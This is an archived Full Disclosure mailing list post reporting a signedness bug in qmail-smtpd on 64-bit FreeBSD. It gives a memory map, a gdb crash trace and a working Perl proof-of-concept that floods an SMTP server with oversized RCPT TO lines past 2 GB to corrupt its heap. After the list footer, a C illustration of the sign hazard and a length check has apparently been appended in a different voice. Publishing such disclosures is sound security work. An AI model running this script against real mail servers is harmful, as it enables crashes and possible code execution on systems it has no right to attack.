Full Disclosure mailing list archives
Re: 64 bit qmail fun
From: Georgi Guninski <guninski () guninski com>
Date: Mon, 9 May 2005 16:17:34 +0300
On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
> http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
> 3. sign problem in qmail_put/substdio_put
On FreeBSD (amdkotef64.localdomain 5.3-BETA6 FreeBSD 5.3-BETA6 #0: Sat Sep 25 21:49:38 UTC 2004 root () fanboy samsco home:/usr/obj/usr/src/sys/GENERIC amd64) the static/heap layout is "better" than Linux, so bytecopy(negative) passes and a lot of memory is corrupted:

0x400000 0x408000 8 0 0xffffff0047c857e0 r-x 1 0 0x2180 COW NNC vnode /var/qmail/bin/qmail-smtpd
0x507000 0x508000 1 0 0xffffff00471e0380 rw- 1 0 0x2180 COW NNC vnode /var/qmail/bin/qmail-smtpd
0x508000 0x50b000 3 0 0xffffff005b5d6c40 rw- 2 0 0x2180 NCOW NNC swap -
0x50b000 0x1778df000 338914 0 0xffffff005b5d6c40 rwx 2 0 0x2180 NCOW NNC swap -
0x200507000 0x200529000 17 0 0xffffff005d2a6700 r-x 59 28 0x4 COW NC vnode /libexec/ld-elf.so.1

Note memory is contiguous.

Program received signal SIGBUS, Bus error.
0x000000020069afb6 in ldexp () from /lib/libc.so.5
(gdb) info stack
#0 0x000000020069afb6 in ldexp () from /lib/libc.so.5
#1 0x000000020069b07c in ldexp () from /lib/libc.so.5
#2 0x000000020069b2eb in ldexp () from /lib/libc.so.5
#3 0x000000020069bc6d in ldexp () from /lib/libc.so.5
#4 0x000000020069bd58 in malloc () from /lib/libc.so.5
#5 0x00000000004058aa in alloc (n=1040) at alloc.c:20
#6 0x000000000040592f in alloc_re (x=0x508e20, m=896, n=1039) at alloc_re.c:11
#7 0x0000000000405580 in stralloc_readyplus (x=0x508e20, n=897) at stralloc_eady.c:6
#8 0x00000000004023a8 in commands (ss=0x507640, c=0x507660) at commands.c:20
#9 0x00000000004020e1 in main () at qmail-smtpd.c:419
(gdb) x/i $rip
0x20069afb6 <ldexp+1654>: movq $0x2,(%rax,%rsi,8)
(gdb) p/x $rax
$7 = 0x200837000
(gdb) p/x $rsi
$8 = 0x7676767676268
0x50b360: 0x76767676 0x76767676 0x54007676 0x76767676

Probably, after substdio is corrupted, even more fun is possible.
---------------------------------------------------------------
#!/usr/bin/perl -w
# copyright georgi guninski
# cannot be used in vulnerability databases
use IO::Socket;

my $host = $ARGV[0] || "localhost";
my $port = $ARGV[1] || 25;
my $sock = IO::Socket::INET->new(Proto => 'TCP', PeerAddr => $host, PeerPort => $port) || die("socket");

my $payload = "v" x (1024*1024);
my $lo2 = "v" x (1024*1024);
my $i = 0;
my $t;

print $sock "HELO a\r\n";
print $sock "MAIL FROM: a\r\n";

my $leg = 842;
$payload = "v" x $leg;
my $cou = 0;
my $vp = "v" x (1024*1024);
my $wri = 0;

# send RCPT TO lines until the accumulated length ($wri) passes 0x80000010
while (42) {
    print $sock "RCPT TO: ${payload}\r\n";
    $t = <$sock>;
    $cou++;
    $wri += ($leg + 2);
    if ($wri > 0x80000010) { last; }
    if ($cou % (1024) == 0) { print " .. " . $wri/(1024*1024) . "\n"; }
}

print $sock "DATA\r\n";
print $sock "where do you want bill gates to go today?\r\n";
print $sock ".\r\n";

while (42) {
    print $sock "${lo2}";
}
while (<$sock>) {
    print $_;
}
---------------------------------------------------------------

--
where do you want bill gates to go today?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
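As an added illustration of the sign problem discussed in this post (example code written here, not qmail's own source): a constructed C model of a buffered writer whose signed int length is fed from an unsigned accumulated length, beside a hardened entry point that rejects lengths above INT_MAX before truncation. The byte_copy stand-in refuses a negative length instead of copying, and the writer struct, field and function names are assumptions made for the demo.

```c
#include <limits.h>
#include <string.h>
/* Constructed, simplified model of the sign hazard in the post (not qmail's
   own code): a buffered writer takes its length as a signed int, but the
   accumulated length feeding it is unsigned and, on 64-bit, can pass INT_MAX;
   truncated to a negative int it skips the fill loop and reaches the copy. */
#define BUFSZ 1024
typedef struct {
    char x[BUFSZ];
    int p;          /* bytes currently buffered */
    long flushed;   /* bytes handed to the simulated output */
} writer;
/* Stand-in for byte_copy: refuses a negative length instead of copying. */
static int checked_copy(char *dst, int len, const char *src) {
    if (len < 0) return -1;
    memcpy(dst, src, (size_t)len);
    return 0;
}
/* Original-style interface: the length arrives as a signed int. */
int put_signed(writer *w, const char *buf, int len) {
    int n = BUFSZ;
    while (len > (n -= w->p)) {           /* false for any negative len */
        if (checked_copy(w->x + w->p, n, buf) < 0) return -1;
        buf += n; len -= n;
        w->flushed += BUFSZ; w->p = 0;    /* simulated flush of a full buffer */
        n = BUFSZ;
    }
    if (checked_copy(w->x + w->p, len, buf) < 0) return -1;
    w->p += len;
    return 0;
}

/* Hardened interface: take the length unsigned and reject it before it can
   be truncated into a negative int. */
int put_checked(writer *w, const char *buf, size_t len) {
    if (len > INT_MAX) return -2;
    return put_signed(w, buf, (int)len);
}
/* Normal path: 1500 bytes cross one buffer boundary; returns bytes written. */
long normal_path(void) {
    writer w = {{0}, 0, 0}; char msg[1500]; memset(msg, 'v', sizeof msg);
    return put_checked(&w, msg, sizeof msg) == 0 ? w.flushed + w.p : -1;
}
/* The post's 0x80000010 accumulated bytes, passed only as a length: neither
   path copies anything, so no buffer of that size is needed. */
int signed_path(void) {
    writer w = {{0}, 0, 0}; unsigned int acc = 0x80000010u;
    return put_signed(&w, "", (int)acc);          /* -1: negative len reached */
}
int checked_path(void) { writer w = {{0}, 0, 0}; return put_checked(&w, "", 0x80000010u); }
```

The signed path shows the negative length arriving at the copy, which is the point at which the real program's memory is corrupted; the checked path stops it at the interface boundary.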
Current thread:
- 64 bit qmail fun Georgi Guninski (May 06)
- Re: 64 bit qmail fun Lars Olsson (May 06)
- Re: 64 bit qmail fun Georgi Guninski (May 09)
- Re: 64 bit qmail fun Georgi Guninski (May 15)